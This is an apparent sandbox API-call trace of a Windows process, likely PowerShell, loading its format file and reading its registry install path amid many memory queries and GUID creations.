	[0337.607] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.607] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.607] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.607] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xdcea218, Data2=0xea00, Data3=0x4798, Data4=([0]=0xa1, [1]=0x62, [2]=0x56, [3]=0xef, [4]=0xc6, [5]=0x23, [6]=0x42, [7]=0x8d))) returned 0x0
	[0337.608] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.608] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.609] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.609] VirtualQuery (in: lpAddress=0x26b5c0, lpBuffer=0x26c480, dwLength=0x30 | out: lpBuffer=0x26c480*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.609] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.609] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.609] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.609] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.609] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x81116f51, Data2=0x2d80, Data3=0x4fb7, Data4=([0]=0xa2, [1]=0x1d, [2]=0xfd, [3]=0x9d, [4]=0xcc, [5]=0x58, [6]=0xbb, [7]=0x15))) returned 0x0
	[0337.610] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x7701610d, Data2=0xd03e, Data3=0x48b8, Data4=([0]=0xb0, [1]=0xb1, [2]=0x53, [3]=0x49, [4]=0x77, [5]=0x57, [6]=0x48, [7]=0x9d))) returned 0x0
	[0337.610] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x6e6d24ab, Data2=0xf372, Data3=0x4b35, Data4=([0]=0x8d, [1]=0x7f, [2]=0x50, [3]=0xfd, [4]=0xa3, [5]=0xd2, [6]=0x78, [7]=0xce))) returned 0x0
	[0337.610] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x52d872b2, Data2=0x305e, Data3=0x42fa, Data4=([0]=0x86, [1]=0x71, [2]=0x11, [3]=0x9b, [4]=0xc5, [5]=0xcc, [6]=0x2c, [7]=0x65))) returned 0x0
	[0337.611] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x31aff36f, Data2=0x345d, Data3=0x46ea, Data4=([0]=0x91, [1]=0x54, [2]=0x40, [3]=0x5c, [4]=0x16, [5]=0x88, [6]=0x93, [7]=0x55))) returned 0x0
	[0337.611] VirtualQuery (in: lpAddress=0x26b6d0, lpBuffer=0x26c590, dwLength=0x30 | out: lpBuffer=0x26c590*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.611] VirtualQuery (in: lpAddress=0x26b760, lpBuffer=0x26c620, dwLength=0x30 | out: lpBuffer=0x26c620*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.611] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2afb0907, Data2=0xbd54, Data3=0x422b, Data4=([0]=0x98, [1]=0x3c, [2]=0xe5, [3]=0xd2, [4]=0x81, [5]=0x43, [6]=0x34, [7]=0x92))) returned 0x0
	[0337.611] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xd8df90cd, Data2=0x7015, Data3=0x4fa8, Data4=([0]=0xa9, [1]=0xec, [2]=0x38, [3]=0x50, [4]=0x36, [5]=0x28, [6]=0x2a, [7]=0x37))) returned 0x0
	[0337.611] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x96380715, Data2=0xa415, Data3=0x490f, Data4=([0]=0xb9, [1]=0x0, [2]=0xe, [3]=0xf, [4]=0x97, [5]=0xb6, [6]=0xc3, [7]=0xaa))) returned 0x0
	[0337.612] SetErrorMode (uMode=0x1) returned 0x1
	[0337.612] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0337.612] SetErrorMode (uMode=0x1) returned 0x1
	[0337.612] GetFileType (hFile=0x304) returned 0x1
	[0337.612] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.613] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.613] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.613] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.614] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.614] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.614] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.614] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.614] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.614] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.614] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.615] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.615] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.615] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.615] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.615] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.615] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.616] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.616] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.616] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.616] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.616] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0xe67, lpOverlapped=0x0) returned 1
	[0337.616] ReadFile (in: hFile=0x304, lpBuffer=0x314a33f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314a33f*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0337.616] ReadFile (in: hFile=0x304, lpBuffer=0x314ad70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x314ad70*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0337.617] SetErrorMode (uMode=0x1) returned 0x1
	[0337.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0337.617] SetErrorMode (uMode=0x1) returned 0x1
	[0337.617] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x304) returned 0x0
	[0337.617] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0337.617] CoTaskMemAlloc (cb=0x5a) returned 0x184950
	[0337.617] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x184950, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
	[0337.617] CoTaskMemFree (pv=0x184950) 
	[0337.617] RegCloseKey (hKey=0x304) returned 0x0
	[0337.618] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x6d29c453, Data2=0x9b55, Data3=0x4fbf, Data4=([0]=0x80, [1]=0x1, [2]=0x6f, [3]=0xc8, [4]=0xa6, [5]=0x44, [6]=0xbe, [7]=0xf8))) returned 0x0
	[0337.619] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2c2769d0, Data2=0xbc8a, Data3=0x4f0d, Data4=([0]=0x89, [1]=0xba, [2]=0x2d, [3]=0x27, [4]=0x15, [5]=0xa, [6]=0x52, [7]=0xde))) returned 0x0
	[0337.619] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x29bdf566, Data2=0xe866, Data3=0x44cf, Data4=([0]=0x8d, [1]=0xde, [2]=0x70, [3]=0x97, [4]=0x86, [5]=0x7c, [6]=0xfe, [7]=0xa6))) returned 0x0
	[0337.619] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xecfd4f6e, Data2=0x55e1, Data3=0x4f62, Data4=([0]=0xaf, [1]=0xe6, [2]=0xc, [3]=0x22, [4]=0x4a, [5]=0x95, [6]=0x7c, [7]=0x83))) returned 0x0
	[0337.619] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xdf60cc2d, Data2=0x1f74, Data3=0x4b1b, Data4=([0]=0x8c, [1]=0x5f, [2]=0xd7, [3]=0x2a, [4]=0x41, [5]=0xa2, [6]=0x44, [7]=0x92))) returned 0x0
	[0337.619] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x22c23204, Data2=0x292, Data3=0x4547, Data4=([0]=0x96, [1]=0x94, [2]=0xcd, [3]=0x70, [4]=0x18, [5]=0x30, [6]=0xf0, [7]=0xd0))) returned 0x0
	[0337.620] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xfe304420, Data2=0x6124, Data3=0x475f, Data4=([0]=0xa1, [1]=0x1d, [2]=0xa3, [3]=0x57, [4]=0xb1, [5]=0x2d, [6]=0x41, [7]=0x22))) returned 0x0
	[0337.620] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.620] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x44a1bfb2, Data2=0x25b5, Data3=0x4ea3, Data4=([0]=0x88, [1]=0xdb, [2]=0x4c, [3]=0x3a, [4]=0xa2, [5]=0x57, [6]=0x47, [7]=0xc4))) returned 0x0
	[0337.620] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x6f6897e5, Data2=0x765e, Data3=0x4529, Data4=([0]=0x9d, [1]=0x66, [2]=0xef, [3]=0xf7, [4]=0xa1, [5]=0x38, [6]=0x31, [7]=0x3b))) returned 0x0
	[0337.620] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x911ca5b, Data2=0x7f99, Data3=0x4e7e, Data4=([0]=0x86, [1]=0x3, [2]=0x7e, [3]=0xbb, [4]=0x3f, [5]=0xaf, [6]=0xde, [7]=0x41))) returned 0x0
	[0337.621] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x4457e6d4, Data2=0xafa5, Data3=0x4007, Data4=([0]=0xb7, [1]=0x9d, [2]=0x82, [3]=0xe3, [4]=0x9d, [5]=0xfc, [6]=0x6c, [7]=0x74))) returned 0x0
	[0337.621] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x6ff8a6ce, Data2=0xbcb5, Data3=0x41f6, Data4=([0]=0xa2, [1]=0x64, [2]=0x4d, [3]=0x96, [4]=0xad, [5]=0x86, [6]=0x4b, [7]=0xe3))) returned 0x0
	[0337.621] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xec420183, Data2=0xbd6e, Data3=0x444d, Data4=([0]=0xbd, [1]=0xcc, [2]=0x8b, [3]=0x4d, [4]=0x5, [5]=0x8, [6]=0x7, [7]=0xc8))) returned 0x0
	[0337.621] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2e99cb6, Data2=0x2312, Data3=0x4012, Data4=([0]=0xb3, [1]=0x4a, [2]=0x39, [3]=0x68, [4]=0x48, [5]=0xe, [6]=0x17, [7]=0x30))) returned 0x0
	[0337.621] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x139d19dd, Data2=0xab7d, Data3=0x42ee, Data4=([0]=0x94, [1]=0xcf, [2]=0x75, [3]=0x10, [4]=0xa6, [5]=0xed, [6]=0x57, [7]=0xf7))) returned 0x0
	[0337.622] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc16f6088, Data2=0x3819, Data3=0x4350, Data4=([0]=0x9d, [1]=0x57, [2]=0x4c, [3]=0x5d, [4]=0x15, [5]=0x20, [6]=0x19, [7]=0x58))) returned 0x0
	[0337.622] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x867daec3, Data2=0x9d39, Data3=0x4ead, Data4=([0]=0xa2, [1]=0xbb, [2]=0x57, [3]=0x7, [4]=0xb, [5]=0xe0, [6]=0xd2, [7]=0x4d))) returned 0x0
	[0337.622] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x64982bfd, Data2=0xb3f0, Data3=0x4e96, Data4=([0]=0xb5, [1]=0xf5, [2]=0x56, [3]=0xdb, [4]=0x11, [5]=0xe8, [6]=0x36, [7]=0x52))) returned 0x0
	[0337.622] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x5316c264, Data2=0x62b, Data3=0x48bc, Data4=([0]=0xbc, [1]=0xeb, [2]=0x41, [3]=0x9c, [4]=0xa4, [5]=0x63, [6]=0x4f, [7]=0x57))) returned 0x0
	[0337.622] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.622] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.623] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.623] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xf85593b1, Data2=0x8794, Data3=0x46e6, Data4=([0]=0x94, [1]=0xf6, [2]=0x20, [3]=0xa6, [4]=0x55, [5]=0xd, [6]=0x8a, [7]=0x23))) returned 0x0
	[0337.623] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xb5d5812d, Data2=0xb33, Data3=0x4569, Data4=([0]=0x8c, [1]=0xe, [2]=0x18, [3]=0x83, [4]=0xd4, [5]=0x2c, [6]=0x47, [7]=0xfe))) returned 0x0
	[0337.623] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xe7d52bec, Data2=0xa419, Data3=0x4af1, Data4=([0]=0xa8, [1]=0x62, [2]=0x68, [3]=0xdf, [4]=0x3b, [5]=0x7c, [6]=0xdb, [7]=0x3))) returned 0x0
	[0337.623] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xe19a9715, Data2=0x242, Data3=0x4fdf, Data4=([0]=0xb9, [1]=0xb0, [2]=0x8a, [3]=0xd1, [4]=0xe7, [5]=0x2a, [6]=0x2a, [7]=0xd))) returned 0x0
	[0337.623] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x263a0e2, Data2=0xeb01, Data3=0x4392, Data4=([0]=0x8a, [1]=0xeb, [2]=0xd8, [3]=0x3c, [4]=0x34, [5]=0xab, [6]=0xe1, [7]=0x3))) returned 0x0
	[0337.624] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc83dd420, Data2=0xba40, Data3=0x43be, Data4=([0]=0xa4, [1]=0xcb, [2]=0xb8, [3]=0xc5, [4]=0xc0, [5]=0x91, [6]=0x21, [7]=0x11))) returned 0x0
	[0337.624] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2865a384, Data2=0x1866, Data3=0x4b2a, Data4=([0]=0xaf, [1]=0x9f, [2]=0x1f, [3]=0x1c, [4]=0x63, [5]=0x1e, [6]=0x49, [7]=0x4f))) returned 0x0
	[0337.624] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x9544ca7b, Data2=0x3712, Data3=0x4124, Data4=([0]=0xa0, [1]=0x9c, [2]=0x90, [3]=0x8d, [4]=0xbf, [5]=0x4c, [6]=0x7, [7]=0x22))) returned 0x0
	[0337.624] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x5da6c6cc, Data2=0xf37b, Data3=0x4f19, Data4=([0]=0x81, [1]=0xd, [2]=0xd1, [3]=0xf3, [4]=0xa, [5]=0x50, [6]=0x9f, [7]=0x8d))) returned 0x0
	[0337.624] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x572fb405, Data2=0x13e, Data3=0x473f, Data4=([0]=0xb1, [1]=0x17, [2]=0x19, [3]=0xa9, [4]=0x36, [5]=0x82, [6]=0x95, [7]=0xec))) returned 0x0
